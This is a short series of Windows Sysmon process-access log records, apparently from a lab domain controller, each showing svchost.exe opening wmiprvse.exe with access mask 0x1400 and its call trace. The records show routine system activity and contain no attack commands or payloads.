{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1052,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1053,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.985\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.985","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1054,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.985\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.985","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1055,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.985\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.985","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1056,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1057,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1058,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1059,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
